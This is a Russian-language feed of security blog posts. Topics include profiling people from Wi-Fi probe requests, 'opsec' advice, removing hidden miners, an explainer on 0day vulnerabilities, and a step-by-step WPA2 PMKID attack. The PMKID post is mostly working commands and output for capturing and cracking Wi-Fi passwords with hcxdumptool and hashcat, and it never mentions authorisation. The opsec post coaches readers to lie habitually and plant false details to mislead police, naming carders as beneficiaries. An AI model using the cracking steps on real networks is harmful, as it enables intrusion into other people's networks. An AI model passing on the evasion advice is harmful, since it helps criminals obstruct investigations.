    Для соединения с уже существующими сетями, которые не оповещают о своем наличии, любому мобильному устройству приходится отправлять пробные пакеты для обнаружения известных им сетей. Перехват этих пакетов возможен при включении гаджета или при отсоединении его от сети. Делается это с помощью обычных инструментов — airodump / tcpdump.
    Например:
    # airodump-ng -w wifi-dump wlan0# tcpdump -n -l -e -r wifi-dump.cap | grep ‘Probe Request ([^)]‘
    В выводе указывается время, MAC-адрес устройства и наименование сети. Еще один пример:
    16:32:26.628209 BSSID:ff:ff:ff:ff:ff:ff DA:ff:ff:ff:ff:ff:ff SA:50:ea:d6:aa:bb:cc Probe Request (SUBWAY) [1.0 2.0 5.5 11.0 Mbit]
    Это означает, что устройству 50:ea:d6:aa:bb:cc нужно было проверить наличие сети SUBWAY в пределах доступности.
    Казалось бы, какая разница, испускает ли ваш гаджет такие пакеты с наименованиями сетей или нет? Есть, правда, один нюанс, а именно, наличие уникальных имен у большинства локальных сетей. Широко распространены имена типа SUBWAY, однако в немалом числе домов сети получают либо автоматически созданные имена по принципу ProviderNameDEADBEEF, либо имена задают им сами пользователи.
    Таким образом, в списке пробных пакетов будут содержаться обычно такие наименования сетей:
    для домашних: ProviderNameXXXXX, StreetNameWifi идр.;
    * для рабочих: Company, CompanyCity ит.п.;
    * для кафе, ресторанов, баров и т.п.: стандартные;
    * для отелей: названия будут уникальными, кроме сетевых отелей.
    Таким образом, если кто-то перехватит такой пробный пакет, он сможет выяснить, какой у вас провайдер и где вы имеете обыкновение питаться, правда, без каких-либо BSSID, координат и т.п.
    Вроде бы ничего страшного, если бы не WiGLE, что расшифровывается как «движок для записи информации о беспроводных сетях». Девиз этого сервиса — «Все сети, которые находят все люди», и с его помощью можно на самом деле отыскать большинство городских сетей по их названию.
    А теперь о том, как возможен сбор информации, основываясь на списке сетей. Взгляните на карту с нанесенными на нее значками – результатами, скачанными с помощью библиотеки wiggle.
    Сети обозначены следующим образом:
    красные – открытые;
    зеленые – зашифрованные;
    синие – неизвестные.
    Причем каждый маркер указывает на некое конкретное здание.
    Что можно выяснить о владельце данного мобильного устройства? Проживает он, скорее всего, на востоке США, часто бывает в Японии, о чем свидетельствует маркер зашифрованной корпоративной сети, на отдых отправляется в Таиланд (об этом говорят сети с названиями отелей) или в Новую Зеландию (здесь сети с наименованием кемпингов). По названию корпоративной сети можно выяснить, как называется компания.
    Можно ли найти данного конкретного человека, основываясь лишь на этих данных?
    Можно, так как в МАС-адресе содержится информация о модели гаджета.
    Есть ли способы как-то скрыть свои данные?
    Опытные люди предлагают сделать на linux настройку сетей wpa_supplicant, указав при этом scan_ssid=0. При такой настройке пробные пакеты отсылаться не будут. Еще можно включать и выключать Wi-Fi по мере надобности, или дать своей домашней сети какое-нибудь распространенное имя, однако полностью замаскироваться все равно не удастся.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    «Паразит» вашей безопасности
    Главным паразитом для вашей безопасности являетесь именно вы.
    Каждое ваше слово, не обязательно лишнее, а просто слово является одновременно причиной и следствием.
    Слово, это следствие отсутствия осознания у собеседника, так как с помощью слов мы объясняем людям, что почем и одновременно следствие причины, началом которой является ваша не разумность.
    Что вы делаете, когда ищите человека в сети ?
    - Ищите в гугле его никнейм, контакты и т.д
    Что можно найти по никнейму, многое… А если вы знаете уже два никнейма, тогда еще больше. Если по первому вы можете ничего не найти, то вместе со вторым явно будет больше информации.
    Закаливание сознания
    Как происходит обучение тому, что вы делаете в первый раз ? Наверно вы пробуете, затем что-то забываете, пробуете еще раз, затем еще раз. Когда нужно делать несколько действий одновременно вы зацикливаетесь на одном, забывая о другом. Представьте что вы в первый раз сели за руль и у вас механическая коробка передач. В первый разы вы глохните, дергаетесь, ваша физиология не привыкла к этим действиям, и вы нажимаете сцепление, но забываете сменить передачу.
    Это тухлый пример, но суть вы поняли.
    К чему я это, а к тому, что всякий раз, когда вы с кем-то разговариваете, вы можете взболтнуть лишнего.
    И это лишнее в итоге может сыграть не в вашу пользу.
    Вспоминается такой афоризм – «Мы учимся говорить два года, а молчать всю жизнь» . Почему так ?
    Каждый раз, когда вы разговариваете в социальных сетях, делаете запрос в поисковую систему, пишите кому-то в скайп, джаббер и другие клиенты вы часто рассказываете о себе:
    (кто-то )- Привет, можешь мне помочь ?
    (вы) – У меня уже поздно, я спать иду, давай завтра.
    1 ) Факт #1 , ваше местоположение исходя из вашего временного пояса. Когда у меня 19.00 а человек мне такое пишет, сразу понятно, что он с Сибири какой-то.
    Далее, очень распространённое событие :
    (кто-то) – Привет, траля ля, траля ля
    (вы) – бл•, соръиа яйа бухой немногаа, давай патом
    2) Противник сразу может занести себе в блокнотик, что вы сегодня пили, и если к вам домой заломятся мешки с мусором в фуражках они обязательно спросят, что было в тот самый день. Конечно, вы ответите, что вы пили с друзьями, типа алиби.
    Но к вашему сожалению это будет совсем наоборот, - подтверждение, что ребята пришли ровно по адресу.
    Надеюсь мне не нужно перечислять все возможные ситуации и то, что не стоит говорить даже знакомым людям в сети, ведь это ваша безопасность. Очень полезно иногда говорить лже сведения. Допустим о погоде, о семье, о других событиях.
    Например, когда вы просто общаетесь, можно сказать :
    Секунду, малой проснулся…
    Далее если вас спросят можно навыдумывать про сына или брата. Точно также можно придумать про погоду :
    Привет, бл•.. Прикинь вчера такой ураган был, свет отрубился.
    Если вы самый ужасный параноик, или просто кардер. То это вам будет только в плюс. Если к вам домой придут, то они найдут массу несоответствий исходя из собранной информации о вас. И это в любом случае хорошо.
    Теперь начинаем закаляться, учимся врать и одновременно молчать. Врать нужно вовремя, а молчать нужно часто, так как язык враг твой во все времена ! Пробуем, практикуемся, пока данная манера разговора не перейдет вам в подсознание, когда вы будете делать это автоматически. Так как в критических ситуациях это поможет, а в ленивых ситуациях избавит вас от лишних мыслей.
    Надеюсь теперь вы понимаете, что «одно лучше, чем два, но хуже чем ничего» относится именно к вашей речи.
    Небольшой список вещей, о которых не стоит говорить :
    1) Откуда вы ( Надеюсь все поняли зачем..) ;
    2) Ваш пол ( Надо быть супер параноиком ) ;
    3) Рассказывать о семье ;
    4) Рассказывать о поездках ;
    5) Рассказывать о машине, где и как вы живете, ситуации из жизни ;
    6) Не говорите конкретные даты.
    Это обыкновенная основа, которую должен соблюдать любой уважающий себя параноик. Даже начинающий.
    Вы не любите OTR фу-фу-фу, вы не любите чистить логи, вы любите поговорить..
    Не пренебрегайте техническими средствами обеспечения анонимности, здесь нет главного и второстепенного, ведь на кону ваша свобода …

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Как распознать,что вы «словили» майнер?
    Скрытый майнер криптовалюты – повсеместно распространяющаяся беда, масштабы которой растут с каждым днем. Зловредное выращивание биткоинов растёт даже быстрее его курса, но в Интернете существует только масса разрозненной информации по поводу того, как удалить скрытый майнер.
    Рассмотрим пошаговую инструкцию о том, как понять, используют ли ваш компьютер программы miner bitcoin и, если да, как удалить такое ПО.
    Как узнать, майнит ли компьютер
    Итак, наша задача – проверить компьютер на скрытый майнер. Речь мы, конечно, будем вести не о профессиональном майнинге, а об обычной, в чем-то даже мошеннической добыче биткоинов с помощью обычного компьютера обычного пользователя. Отметим, что в большинстве случаев владельцы девайсов не подозревают, что их устройство использует кто-то чужой.
    Да и заметить это практически невозможно: мошенники не так глупы, чтобы сразу нагружать вашу видеокарту или процессор на 100% – хотя бывают и такие личности. Поэтому первым делом, проверьте, не загружены ли ваши основные устройства производительности до отказа. Если это так, то листайте инструкцию вниз, а если подозрительной нагрузки не выявлено – читайте по пунктам далее.
    Находим скрытый майнер на компьютере. Шаг первый: понимаем принцип работы.
    Вы наверняка уже догадались, что скрытый майнер можно не заметить, особенно если ноутбук или компьютер не очень мощны. Однако нам поможет важное условие скрытой работы bitcoin miner: это предварительный запуск программ с правами администратора.
    Да, вот так банально майнеры и проникают на компьютер. Вы получаете какое-то письмо со ссылкой, переходите по ней, устанавливаете вроде бы полезную программу (например, драйвер или браузер), а скрытый майнинг закачивается вместе с ней. После этого программа майнинга начинает работать в автономном режиме, подключаясь через интернет к койн-фермам.
    Так что первым превентивным шагом к чистому компьютеру является полная разумность в распределении администраторских прав на программы. Не лишним будет и забыть о скачивании кряков, пиратского софта, да и торрентами лучше не пользоваться, хотя бы просто потому, что через VPN программы сидеть и проще и безопаснее.
    Шаг второй: отключаем доступ к майнинг-ферме.
    Для начала просто выключите интернет, а затем перейдите по пути C:\Windows\System32\drivers\etc и откройте с помощью программы «Блокнот» файл hosts.
    Внимание! Эта папка является системной и скрытой, поэтому разрешите показ скрытых файлов, а также их модификацию в настройках вашей Windows системы.
    В файле hosts скрытый майнер обычно прописывает путь до своей фермы, поэтому вам нужно удалить все подозрительные IP-адреса. На примере ниже цветным выделение обозначено место, где добытчик биткоинов указал сетевой путь.
    Имейте в виду, что если ваш провайдер оставляет логи ваших путешествий в Интернете, то вирусный майнинг может легко по ним вернуться на ваш компьютер. Поэтому лучше использовать программы VPN без записи логов.
    Шаг третий: краткий абзац о том, как избавиться от майнера.
    Если ваш компьютер уже майнят, то тянуть смысла не имеет. Заряжаем оружие по полной и качаем любой автономный антивирус.
    Dr.Web CureIT
    Virus Removal Tool
    Ставим антивирус на проверку компьютера и ждём. Данные программы удалят примерно 60% всех известных видов майнеров, особенно хорошо антивирусы справляются с «детскими» видами ферм, которые просто прячутся за известными именами файлов – chrome.exe, svchost.exe и другими.
    Если вы подозреваете какой-то конкретный файл, то проверьте его онлайн-антивирусом.
    Следующую пачку процентов заражения удаляем с помощью анти-руткита TDSSKiller. Эта программа от Касперского чистит все действительно скрытые от глаз пользователя процессы.
    До конца очищаем систему от скрытых майнеров с помощью автоматической чистки реестра программой CCleaner или (для самых опытных) прибегая к полной переустановке системы.
    Ещё раз о методах профилактики перед скрытым майнером
    Правило первое.
    Никаких подозрительных программ. Устанавливайте только то, что вам действительно нужно.
    Правило второе.
    Никаких подозрительных сайтов. Старайтесь заходить только на те сайты, которые защищены сертификатом ssl.
    Правило третье.
    Избегайте логов и старайтесь быть анонимным. Лучшим вариантом для этого являются надежные VPN сервисы.
    Правило четвертое.
    Установите на постоянной основе любой популярный антивирус. Включите его и на стационарном компьютере и даже на Андроиде.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    0day уязвимость:что это такое?
    0day уязвимость также известная как 0day компьютера, это недостатки или уязвимости программного обеспечения, аппаратного обеспечения или прошивки, неизвестной стороне или сторонам.
    0day может относиться к самой уязвимости, или может относиться к эксплойту с 0day, которая использует уязвимость для атаки уязвимых систем.
    Как работает 0day эксплоит?
    Эксплоит с 0day - это атака, которая использует ранее неизвестную уязвимость безопасности. Атака с 0day также иногда определяется как атака, которая использует уязвимость безопасности в тот же день, когда уязвимость становится общеизвестной. Другими словами, время между обнаружением уязвимости и первой атакой и есть «0day».
    Исторически сложилось так, что уязвимости, которые становятся причиной атак 0day, были вызваны небезопасными методами разработки программного обеспечения. Чтобы смягчить эти уязвимости, разработчики должны создавать и выпускать исправления, и пользователи, особенно предприятия, должны устанавливать исправления своевременно.
    Когда исследователь обнаруживает уязвимость в безопасности в операционной системе, приложении или любом другом коде или системе, исследователь или их компания часто уведомляют поставщика или производителя об ошибочной системе, поэтому можно предпринять меры для устранения недостатка с помощью патча или предложениями по смягчению последствий от уязвимости.
    Исследователи безопасности сотрудничают с поставщиками и обычно соглашаются хранить в тайне все детали уязвимостей с 0day в течение разумного периода времени, прежде чем публиковать эти данные. Например, Google Project Zero следует отраслевым рекомендациям, которые дают поставщикам до 90 дней исправлять уязвимость до того, как исследователь нашедший уязвимость публично раскрывает тот или иной недостаток. Для уязвимостей, которые считаются «критическими», Project Zero дает только 7 дней, чтобы поставщик исправил до публикации уязвимости; если уязвимость активно используется, Project Zero может сократить время для ответа от поставщика до менее чем сем дней.
    Обнаружение 0day эксплоита.
    Операции с 0day, как правило, очень трудно обнаружить. По определению эти эксплоиты ранее неизвестны, что означает, что инструменты безопасности на основе сигнатур, такие как антивирусное программное обеспечение, а также некоторые системы обнаружения вторжений (IDSes) и системы предотвращения вторжений (IPSes) полностью неэффективны при обнаружении эксплойта, поскольку нет сигнатуры атаки.
    Одним из эффективных методов обнаружения атаки с 0day является аналитика поведения пользователей. Большинство объектов, имеющих право доступа к сетям, демонстрируют определенные шаблоны использования и поведения, которые считаются нормальными. Действия, выходящие за пределы обычного объема операций, могут быть индикатором атаки 0day..
    Например, сервер веб-приложений обычно отвечает на запросы, которые считаются нормальными для этого приложения; приложение, в свою очередь, отвечает на эти запросы определенным образом. Если обнаружены исходящие пакеты, выходящие из порта, назначенного этому веб-приложению, и эти пакеты не соответствуют тому, что обычно генерируется приложением, это хороший признак того, что идет атака.
    Период 0day эксплоита
    После того, как 0day уязвимость стала публичной, она далее будет называться как уязвимость n-day (также известная как однодневная уязвимость).
    Эти уязвимости в n-day продолжают функционировать и также используются уже после того, как уязвимости были исправлены или исправлены другими поставщиками. Например, кредитное бюро Equifax было взломано в 2017 году злоумышленниками, использующими эксплойт нацеленную на уязвимость веб-инфраструктуры Apache Struts. Атакующие использовали уязвимость в Apache Struts, о которой сообщалось и ранее в этом году, были внесены поправки; Equifax не удалось устранить эту уязвимость, и был взломан злоумышленниками, использующие уязвимость, не прошедшую фильтрацию.
    Аналогичным образом, исследователи продолжают находить уязвимость в течение дня в протоколе Block Message Server, использующийся в ОС Windows в течение многих лет. Как только уязвимость с нулевым днем становится публичной, пользователи должны исправить свои системы, но злоумышленники продолжают использовать в Интернете уязвимости до тех пор, пока незащищенные системы остаются уязвимыми.,
    Защита от 0day атак.
    Слишком сложно защититься от 0day атак, поскольку их так трудно обнаружить. Программное обеспечение для проверки уязвимостей использует сигнатуры проверки вредоносных программ для сравнения подозрительного кода с сигнатурами известных вредоносных программ; когда вредоносное ПО использует 0day эксплойт, который ранее не встречался, такие сканеры уязвимостей не смогут заблокировать вредоносный малварь.
    Поскольку 0day-уязвимость, не может быть известна заранее, нет способа защититься от конкретного эксплойта, пока он не будет обнаружен и внесен в сигнатуры антивирусных программ. Однако компании могут снизить уровень риска, сделав ниже следующее:
    Использовать виртуальные локальные сети для разделения некоторых областей сети или использования выделенных физических или виртуальных сегментов сети, чтобы изолировать чувствительный трафик между серверами.
    Внедрить IPsec, протокол IP-безопасности, для применения шифрования и аутентификации к сетевому трафику.
    Применить IDS или IPS. Несмотря на то, что продукты безопасности IDS и IPS на основе сигнатур не могут идентифицировать атаку, они могут предупредить, защищающие ваш компьютер программы, о подозрительной деятельности, которая возникает как побочный эффект атаки.
    Использовать средство управления доступом к сети, чтобы предотвратить доступ при помощи машин злоумышленников к важнейшим частям корпоративной среды.
    Блокировать точки беспроводного доступа и используйте схему безопасности, такую как защищенный доступ Wi-Fi 2 для максимальной защиты от атак через беспроводные сети
    Держать все системы обновленными. Несмотря на то, что исправления не предотвращают 0day атаку, содержание функционала обновленными полноценных сетевых ресурсов может затруднить атакам достичь поставленных целей. Когда 0day патч становится доступным, применить его как можно скорее.
    Выполнять регулярное сканирование уязвимостей для корпоративных сетей и блокировать обнаруженные уязвимости.
    Несмотря на то, что поддержание высокого уровня безопасности информации не предотвратить и не помешает всем 0day атакам, но оно может помочь предотвратить 0day атаки, которые будут совершаться после того, как уязвимости были исправлены.
    Примеры 0day атак.
    Многократные 0day атаки обычно происходят каждый год. Например, в 2016 году была 0day атака(CVE-2016-4117), которая использовала ранее не обнаруженный недостаток в Adobe Flash Player. Также в 2016 году более 100 организаций попались на ошибке 0day (CVE-2016-0167), которая была использована для повышения привилегии атаки, ориентированной в основном на Microsoft Windows.
    В 2017 году была обнаружена 0day уязвимость (CVE-2017-0199), в которой было показано, что документ Microsoft Office в расширенном текстовом формате может инициировать выполнение визуального базового сценария, содержащего команды PowerShell при открытии. Еще один эксплойт 2017 (CVE-2017-0261) использовал инкапсулированный PostScript в качестве платформы для инициации заражения вредоносными программами.
    Червь Stuxnet был разрушительным 0day эксплойтом, который был нацелен на системы контроля и сбора данных (SCADA) первые атаки компьютеров, работающих под управлением операционной системы Windows. Stuxnet использовал четыре различные 0day уязвимости в Windows и распространялся через зараженные USB-диски, что позволяло удаленно заражать как системы Windows, так и SCADA, не атакуя их через сеть. Стало общеизвестно, что червь Stuxnet это результат совместных усилий американских и израильских спецслужб по пресечению иранской ядерной программы.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Техника атаки WPA2, не требующая наличия клиента на AP
    Участниками проекта hashcat обнаружен новый вектор атаки на беспроводной стандарт WPA2, не требующий классического перехвата "рукопожатия" между клиентом и точкой доступа. Данная уязвимость выявлена в рамках исследования потенциальных проблем безопасности нового протокола WPA3.
    Основное отличие от существующих атак заключается в том, что в этой атаке захват полного 4-стороннего рукопожатия EAPOL не требуется. Новая атака выполняется в RSN IE (Robust Security Network Information Element), и для ее успешного воспроизведения достаточно одного кадра EAPOL.
    В настоящее время не известно, для какого количества маршрутизаторов этот метод будет работать, — вероятнее всего, для всех существующих сетей 802.11i /p/q/r с включенными функциями роуминга, а это большинство современных маршрутизаторов.
    Основные особенности новой атаки:
    нет необходимости ждать клиентов — атакуется напрямую AP;
    нет необходимости ждать полного 4-стороннего «рукопожатия» между клиентом и AP;
    отсутствие ретрансмиссии кадров EAPOL;
    исключает вероятность захвата неверных паролей от клиента;
    исключены потери кадров EAPOL при отдалении/потери связи с клиентом;
    высокая скорость, обусловленная отсутствием необходимости фиксировать значения nonce и replaycounter;
    нет необходимости в специализированном формате выходных данных (pcap, hccapx и т. д.) — захваченные данные хранятся в виде hex-строки.
    Детали атаки
    RSN IE — это необязательное поле, которое можно найти в рамках управления 802.11. Одной из возможностей RSN является PMKID.
    PMKID вычисляется с использованием HMAC-SHA1, где ключ является PMK, а часть данных представляет собой конкатенацию фиксированной строковой метки «PMK Name», MAC-адрес точки доступа и MAC-адрес станции.
    PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
    Поскольку PMK такой же, как в обычном четырехстороннем рукопожатии EAPOL, это идеальный вектор атаки. Мы получаем все необходимые данные в первом кадре EAPOL из AP.
    Для атаки потребуются следующие инструменты (актуальные версии):
    hcxdumptool
    hcxtools
    hashcat
    Запускаем hcxdumptool для "снятия" PMKID:
    $ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
    start capturing (stop with ctrl+c)
    INTERFACE:...............: wlp39s0f3u4u5
    FILTERLIST...............: 0 entries
    MAC CLIENT...............: 89acf0e761f4 (client)
    MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
    EAPOL TIMEOUT............: 20000
    DEAUTHENTICATIONINTERVALL: 10 beacons
    GIVE UP DEAUTHENTICATIONS: 20 tries
    REPLAYCOUNTER............: 62083
    ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
    Об успешном завершении атаки (средняя продолжительность 10 минут) уведомит надпись FOUND PMKID:
    [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e [ASSOCIATIONREQUEST, SEQUENCE 4]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
    После чего необходимо сконвертировать полученные данные:
    $ ./hcxpcaptool -z test.16800 test.pcapng
    start reading from test.pcapng
    summary:
    --------
    file name....................: test.pcapng
    file type....................: pcapng 1.0
    file hardware information....: x86_64
    file os information..........: Linux 4.17.11-arch1
    file application information.: hcxdumptool 4.2.0
    network type.................: DLT_IEEE802_11_RADIO (127)
    endianess....................: little endian
    read errors..................: flawless
    packets inside...............: 66
    skipped packets..............: 0
    packets with FCS.............: 0
    beacons (with ESSID inside)..: 17
    probe requests...............: 1
    probe responses..............: 11
    association requests.........: 5
    association responses........: 5
    authentications (OPEN SYSTEM): 13
    authentications (BROADCOM)...: 1
    EAPOL packets................: 14
    EAPOL PMKIDs.................: 1
    1 PMKID(s) written to test.16800
    которые после конвертации примут следующий вид:
    2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
    представляющие из себя hex-значения следующих типов данных:
    PMKID*MAC AP*MAC Station*ESSID
    Далее остается "скормить" полученные результаты утилите hashcat (да, без брута пока никуда) и ждать результат:
    $ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
    Данная техника значительно упрощает и ускоряет атаку на большинство беспроводных устройств благодаря меньшему количеству факторов влияния.
    P.S.: эта уязвимость в большей степени затрагивает домашние/SOHO-устройства, в корпоративном сегменте, как правило, используется более надежный MGT WPA2 Enterprise с RADIUS-ключами

    post-img